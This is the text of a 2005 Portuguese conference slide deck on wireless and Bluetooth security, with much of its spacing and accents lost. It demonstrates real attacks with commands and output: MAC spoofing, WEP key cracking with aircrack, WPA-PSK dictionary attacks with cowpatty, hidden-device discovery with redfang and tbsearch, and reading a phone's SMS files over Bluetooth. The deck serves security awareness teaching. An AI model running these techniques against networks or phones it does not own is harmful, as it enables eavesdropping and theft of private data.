Você está na página 1de 63

Seguranaemredessemfio

21/10/2005

Nelson Murilo
<nelson@pangeia.com.br>
Perfil
Auditor da AC-Raiz do ICP.gov
2 livros publicados: Segurana de redes e
Segurana em redes sem fio
Coordenou o Centro de Tratamento e
Respostas Incidentes do DPF
Autor de ferramentas de segurana em cdigo
aberto (ex: www.chkrootkit.org)
Colaborador do Cert.BR e CTIR.Gov
NelsonMurilo
nelson@pangeia.com.br
Redessemfio

WiFi
Bluetooth
Infravermelho
WiMax
Celular(GSM/TDMA/CDMAetc)

NelsonMurilo
nelson@pangeia.com.br
CaractersticasderedesWiFi

WiFiusafaixaIndustrial,Scentific&Medical(ISM)
902 928MHz
2.4 2.485GHz(2.4a2.5GHznoBrasil)
5.150 5.825GHz

WiMax(802.16/a)usamfaixaslicenciadas(1066/210Ghz)

NelsonMurilo
nelson@pangeia.com.br
CaractersticasderedesWiFi
IEEE802.11
Padresatuais:
802.11b 22Mb 2.4Ghz
802.11a 54Mb 5.1GHz
802.11g 54Mb 2.4Ghz
802.11iMecanismosdesegurana
802.1xMecanismosdeautenticao,uso
emredescabeadasesemfio
NelsonMurilo
nelson@pangeia.com.br
Padresatuais

802.11b WEP(802.1x)

802.11a/g WEP/WPA(802.1x)

802.11i WEP/WPA/RSN(AES,AdHoc,etc)

NelsonMurilo
nelson@pangeia.com.br
Canais802.11b
CanalFreqncia
12.412
22.417
32.422
42.427
52.432
62.437
72.442
82.447
92.452
102.457
112.462
122.467
132.472
142.484
NelsonMurilo
nelson@pangeia.com.br
Modelodeuso
Ad-Hoc

NelsonMurilo
nelson@pangeia.com.br
Modelodeuso
Infraestrutura

NelsonMurilo
nelson@pangeia.com.br
Modelodeuso
Rede Aberta Broadcast SSID

NelsonMurilo
nelson@pangeia.com.br
Modelodeuso
Rede Fechada Broadcast desabilitado

NelsonMurilo
nelson@pangeia.com.br
WiredEquivalentPrivacyWEP

NelsonMurilo
nelson@pangeia.com.br
WiFiProtectedAccessWPA

Disponvelantesdopadro802.11i

Doistipos
WPAPSKChaveprviamentecompartilhada
WPA(2)Enterprise(exige802.1x)

NelsonMurilo
nelson@pangeia.com.br
WPAPreSharedKey(PSK)

NelsonMurilo
nelson@pangeia.com.br
802.1x(ExtensibleAuthenticationProtocolEAP)

NelsonMurilo
nelson@pangeia.com.br
RedessemfioPrincipaisproblemas

Configuraopadro(senhas,nomedarede,usode
DHCP,SNMP,etc)
Mtodosdefiltragemineficientes
FragilidadedoWEP
Escutadotrfego
Negaodeservio
ProblemascomWPAe802.1x
NelsonMurilo
nelson@pangeia.com.br
ConfiguraesdefbricaSNMP
#snmpwalk -Os -c public -v 1 192.168.0.1 system

sysDescr.0 = STRING: Netgear ProSafe Dual-


Band Wireless Firewall FWAG114
sysObjectID.0 = OID: enterprises.0
sysUpTime.0 = Timeticks: (699775)
1:56:37.75
sysContact.0 = STRING:http://www.netgear.com
sysName.0 = STRING:
sysLocation.0 = STRING:
sysServices.0 = INTEGER: 6

NelsonMurilo
nelson@pangeia.com.br
FiltrodeMAC

NelsonMurilo
nelson@pangeia.com.br
$ ifconfig wlan0
FiltroporMAC
wlan0 Link encap:Ethernet HWaddr 00:0C:41:E3:5F:5A
inet addr:192.168.11.3 Bcast:192.168.11.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:842 errors:0 dropped:0 overruns:0 frame:0
TX packets:637 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:152984 (149.3 KiB) TX bytes:69539 (67.9 KiB)

c:\> ipconfig /all


Windows 2000 IP Configuration
[...]

Ethernet adapter Local Area Connection:


Connection-specific DNS Suffix . : xxx.com.br
Description . . . . . . . . . . . : 3Com EtherLink XL 10/100 PCI
For Complete PC Management NIC (3C905C-TX)
Physical Address. . . . . . . . . : 00-04-76-16-3F-DB

NelsonMurilo
nelson@pangeia.com.br
FiltroporMAC
Linux
#ifconfigath0hwether00:00:00:00:00:01

FreeBSD
#ifconfigxl3ether00:00:00:00:00:01

OpenBSD/NetBSD
#wiconfigwi0m00:00:00:00:00:01

NelsonMurilo
nelson@pangeia.com.br
FiltroporMAC

NelsonMurilo
nelson@pangeia.com.br
DesabilitarbroadcastdeESSID

NelsonMurilo
nelson@pangeia.com.br
DesabilitarbroadcastdeESSID

NelsonMurilo
nelson@pangeia.com.br
DesabilitarbroadcastdeESSID

NelsonMurilo
nelson@pangeia.com.br
DesabilitarbroadcastdeSSID

NelsonMurilo
nelson@pangeia.com.br
DesabilitarbroadcastdeESSID

NelsonMurilo
nelson@pangeia.com.br
DesabilitarbroadcastdeESSID

NelsonMurilo
nelson@pangeia.com.br
DesabilitarbroadcastdeESSID
23:05:16.386193Beacon()[1.02.05.511.06.012.024.036.0Mbit]ESSCH:11

23:05:16.488612Beacon()[1.02.05.511.06.012.024.036.0Mbit]ESSCH:11

23:05:17.321039Beacon(Homenet54)[1.02.05.511.0Mbit]ESSCH:3

23:05:17.629271Beacon(Homenet54)[1.02.05.511.0Mbit]ESSCH:3

23:05:17.802928ProbeRequest(NETGEAR)[1.02.05.511.0Mbit]
23:05:17.831746ProbeRequest(NETGEAR)[1.02.05.511.0Mbit]
23:05:17.873675ProbeRequest(NETGEAR)[1.02.05.511.0Mbit]
23:05:17.887420AssocRequest(NETGEAR)[1.02.05.511.0Mbit]

NelsonMurilo
nelson@pangeia.com.br
EscutadetrfegoRedeaberta
# tcpdump -i eth0 -s 1700
tcpdump: WARNING: eth0: no IPv4 address assigned
tcpdump: listening on eth0, link-type EN10MB
(Ethernet), capture size 1700 bytes
17:09:38.193741 IP (tos 0x0, ttl 128, id 49930,
offset 0, flags [DF], length:
48)192.168.11.2.3597 > 200.155.13.26.http: S
[tcp sum ok] 3524687372:3524687372(0) win 16384
<mss 1460,nop,nop,sackOK>

NelsonMurilo
nelson@pangeia.com.br
EscutadetrfegoIsolamento
PSPF(PubliclySecurePacketForwarding)ouPrivacySeparator

X NelsonMurilo
nelson@pangeia.com.br
EscutadetrfegoIsolamento
ping -c 3 192.168.11.2
PING 192.168.11.2 (192.168.11.2) 56(84) bytes of data.
From 192.168.11.4 icmp_seq=1 Destination Host Unreachable
From 192.168.11.4 icmp_seq=2 Destination Host Unreachable
From 192.168.11.4 icmp_seq=3 Destination Host Unreachable
--- 192.168.11.2 ping statistics ---
3 packets transmitted, 0 received, +3 errors, 100% packet loss,
time 2017ms

Pormotrfegocontinuapassveldesercapturado
22:44:37.605465 192.168.11.2.33010 > oscommerce.pulver.com.www: .
ack 27075 win 59684 <nop,nop,timestamp 907215 341459491> (DF)
22:44:37.609406 oscommerce.pulver.com.www > 192.168.11.2.33010: P
27075:27120(45) ack 542 win 6492 <nop,nop,timestamp 341459495
907176> (DF)
22:44:37.613282 192.168.11.2.33010 > oscommerce.pulver.com.www: .
ack 27120 win 59684 <nop,nop,timestamp 907216 341459495> (DF)
22:44:38.260568 192.168.11.2.33010 > oscommerce.pulver.com.www: P
542:996(454) ack 27120 win 59684 <nop,nop,timestamp 907280
341459495> (DF)

NelsonMurilo
nelson@pangeia.com.br
FragilidadedoWEP
#timeaircracktrafego.cap(72MBbytes~3horasdecaptura)
aircrack2.1
*Got264394!uniqueIVs|fudgefactor=2
*Elapsedtime[00:00:01]|tried0keysat0k/m
KBdepthvotes
00/246(28)20(15)97(13)D8(12)DB(10)BE(8)38(5)
10/241(30)97(18)4D(13)D8(13)7E(12)91(12)86(9)
20/24E(65)51(55)0F(15)48(15)B3(15)53(9)F0(5)
30/254(58)E9(48)DA(28)F6(21)F3(16)D1(15)F4(15)
40/141(174)5F(41)9A(28)9B(24)50(22)A4(21)F5(21)
KEYFOUND![46414E5441]
real0m31.939s
user0m0.706s
sys0m0.533s

NelsonMurilo
nelson@pangeia.com.br
FragilidadedoWEPtrfegodecifrado
#tcpdumpvvvrtrafego.cap
01:10:27.402389RetryWEPEncrypted258usDataIV:1fe1d0Pad0KeyID0
01:10:27.4025530usAcknowledgmentRA:00:09:5b:66:3d:0e
01:10:27.403501WEPEncrypted213usDataIV:52Pad0KeyID0
01:10:27.4037020usAcknowledgmentRA:00:02:2d:2b:e3:1d
01:10:27.4407270usBeacon(NETGEAR)[1.0*2.0*5.5*11.0*6.012.024.0
36.0Mbit]ESSCH:11,PRIVACY
01:10:27.442050WEPEncrypted258usDataIV:1fe1d1Pad...

#802ethertrafego.capdecifrado.cap46414E5441
Read528221packets,wrote264394packets.

#tcpdumpvvvrdecifrado.cap
01:10:27.402389IP(tos0x8,ttl47,id22102,offset0,flags[DF],length:1440)
freebsd.isc.org.40092>192.168.0.2.49181:.[tcpsumok]3457712421:345771
3809(1388)ack3715159866win65535<nop,nop,timestamp3442224490
2138687>
01:10:27.403501IP(tos0x0,ttl64,id23505,offset0,flags[DF],length:52)
192.168.0.2.49181>freebsd.isc.org.40092:.[tcpsumok]1:1(0)ack1388win
32618<nop,nop,timestamp21388353442224490> NelsonMurilo
nelson@pangeia.com.br
NegaodeservioDoS

NelsonMurilo
nelson@pangeia.com.br
ProblemascomWPA

AschavesfixasnomodeloPSK(prviamente
compartilhadas)podemseratacadasporforabrutae
dicionrio.
ModeloEnterprise(802.1xEAP)criaoutrospontos
devulnerabilidade(cliente,servidorRADIUS,etc.)

NelsonMurilo
nelson@pangeia.com.br
ProblemascomWPA

# tcpdump -w trafego.log

#cowpatty -f /usr/share/dict/word -r trafego.log -s NETGEAR


cowpatty 2.0 - WPA-PSK dictionary attack. <jwright@hasborg.com>
Collected all necessary data to mount crack against passphrase.
Starting dictionary attack. Please be patient.

NelsonMurilo
nelson@pangeia.com.br
802.1xEAP

NelsonMurilo
nelson@pangeia.com.br
Concluso

Redessemfiopodemsertosegurasquantoas
redescabeadas.Pormexigemumesforoadicional,
principalmentenoaspectode
autenticao/identificao
Somenosresistentesaataquesdenegaode
serviooumesmointerferncias

NelsonMurilo
nelson@pangeia.com.br
NelsonMurilo
nelson@pangeia.com.br
Caractersticasbsicas

Freqncia2.4GHz
Usopontoapontoouemrede(piconets1+7)

Concentradoresbluetoohparaconexocom

redesIP(roteamento)
Alcancepadrode10a250metros

NelsonMurilo
nelson@pangeia.com.br

Celulares
Notebooks
PDAs
Impressoras/Fax
Fones
Teclado/Mouse
...

NelsonMurilo
nelson@pangeia.com.br
Piconet

NelsonMurilo
nelson@pangeia.com.br
PersonalAreaNetworkPAN

NelsonMurilo
nelson@pangeia.com.br
Distncias
Alcancepadrode10a250metros

wifitoys

NelsonMurilo
nelson@pangeia.com.br
Distncias
Alcancepadrode10a250metros

NelsonMurilo
nelson@pangeia.com.br
Ferramentas

NelsonMurilo
nelson@pangeia.com.br
Ferramentas
# hcitool scan
Scanning ...
00:80:17:4E:26:4D Phantomd
00:60:57:DF:1D:28 Nokia 6600
00:07:10:0D:3C:48 tungsten
00:0A:19:01:D5:E0 Sander

NelsonMurilo
nelson@pangeia.com.br
Ferramentas

NelsonMurilo
nelson@pangeia.com.br
Equipamentoidentificado

NelsonMurilo
nelson@pangeia.com.br
Equipamentoidentificado
# hcitool scan
Scanning ...
00:60:57:DF:D1:28 Nokia 6600

NelsonMurilo
nelson@pangeia.com.br
Equipamentooculto
# hcitool scan
Scanning ...
#

NelsonMurilo
nelson@pangeia.com.br
Equipamentooculto
# hcitool info 00:60:57:DF:1D:28
Requesting information ...
BD Address: 00:60:57:DF:1D:28
Device Name: Nokia 6600
LMP Version: 1.1 (0x1) LMP Subversion: 0x248
Manufacturer: Nokia Mobile Phones (1)
Features: 0xbf 0x28 0x21 0x00 0x00 0x00 0x00 0x00
<3-slot packets> <5-slot packets> <encryption>
<slot offset> <timing accuracy> <role switch>
<sniff mode> <SCO link> <HV3 packets> <CVSD>

NelsonMurilo
nelson@pangeia.com.br
Equipamentooculto

NelsonMurilo
nelson@pangeia.com.br
Equipamentooculto
# fang -r 006057000000-006057FFFFFF
redfang - the bluetooth hunter ver 2.5
(c)2003 @stake Inc
author: Ollie Whitehouse <ollie@atstake.com>
Address range 00:60:57:00:00:00 -> 00:60:57:FF:FF:FF
Found: Nokia 6600 [00:60:75:fd:1d:01]
Getting Device Information.. Connected.
LMP Version: 1.1 (0x1) LMP Subversion: 0x248
Manufacturer: Nokia Mobile Phones (1)
Features: 0xbf 0x28 0x21 0x00
<3-slot packets>
<5-slot packets>
<encryption>
<slot offset>
<timing accuracy>
<role switch>
<sniff mode>
<SCO link>
<HV3 packets>
<CVSD> NelsonMurilo
nelson@pangeia.com.br
Equipamentooculto
# cat /usr/local/etc/btoui # tbsearch hci0
Texas_Instruments 08:00:28 Using hci0...
... Using 1 dev.
palm 00:07:E0 hci0:Trying 08:00:28:00:00:00
AppleKeyboard 00:0A:95 hci0:Trying 08:00:28:00:00:01
EricssonT68i 00:0A:D9
HP_iPAQ 08:00:28
hci0:Trying 08:00:28:00:00:02
HP_iPAQh5500 08:00:17 hci0:Trying 08:00:28:00:00:03
Nokia3650 00:60:57 hci0:Trying 08:00:28:00:00:04
Nokia6600 00:60:57 hci0:Trying 08:00:28:00:00:05
Nokia6820 00:02:ee hci0:Trying 08:00:28:00:00:06
Nokia7650 00:02:EE hci0:Trying 08:00:28:00:00:07
NokiaNGage 00:60:57 hci0:Trying 08:00:28:00:00:08
SiemensFujitsu_LOOX600 00:E0:00 hci0:Trying 08:00:28:00:00:09
SiemensS55 00:01:E3
SiemensSX1 00:01:E3
SonyEricssonP800 00:0A:D9
SonyEricssonT610 00:0A:D9
...

NelsonMurilo
nelson@pangeia.com.br
Riscos
# tbsearch -n Nokia6600 hci0 hci1
** Using vendor Nokia6600
Using hci0...
Using hci1...
Using 2 devs.
hci0: Trying 00:60:57:00:00:00
hci1: Trying 00:60:57:00:00:01
hci1: Trying 00:60:57:00:00:02
hci0: Trying 00:60:57:00:00:03
hci1: Trying 00:60:57:00:00:04
hci0: Trying 00:60:57:00:00:05
hci1: Trying 00:60:57:00:00:06
hci0: Trying 00:60:57:00:00:07
hci1: Trying 00:60:57:00:00:08
hci0: Trying 00:60:57:00:00:09
hci1: Trying 00:60:57:00:00:0a
hci0: Trying 00:60:57:00:00:0b
hci1: Trying 00:60:57:00:00:0c
hci0: Trying 00:60:57:00:00:0d
[...]
NelsonMurilo
nelson@pangeia.com.br
Riscos
Local device 00:11:61:AA:BB:55
Remote device 00:65:75:FF:10:92 (4)
Welcome
$
$ cd \system\data
$ find . sms*
-rw-rw-rw- 69 Apr 13 22:12 2005 c:\system\data\smsreast.dat
-rw-rw-rw- 64 Apr 13 12:01 2005 c:\system\data\smssegst.dat

Onde:
\System\Data\smssegst.datMensagensSMSenviadas
\System\Data\smsreast.datMensagensSMSrecebidas

NelsonMurilo
nelson@pangeia.com.br
Riscos
Vriassoluesdecomrciomovelestofortementebaseadas
emserviosdeSMS

PAGOWIND

CRANDY
\System\Data\smssegst.datMensagensSMSenviadas
\System\Data\smsreast.datMensagensSMSrecebidas

NelsonMurilo
nelson@pangeia.com.br
Facilitadoresdeacesso

AsoperadorasentregamocartocomPIN
padro

Vriasinformaespodem
seracessadasremotamente

NelsonMurilo
nelson@pangeia.com.br
PersonalAreaNetworkPAN
#hcitoolscan
scanning...
00:10:60:A2:09:2CBluetoothAccessPointRouter

NelsonMurilo
nelson@pangeia.com.br
PAN

NelsonMurilo
nelson@pangeia.com.br
Vazamentodeinformaes

Copiaearmazenamentonocelular/pda/notebook

Ponteredelocaleredediscada

Ponteredelocaleusurioexterno

Cpiaeenvioparausurioexterno

NelsonMurilo
nelson@pangeia.com.br
Seguranaemredessemfio

21/10/2005

Nelson Murilo
<nelson@pangeia.com.br>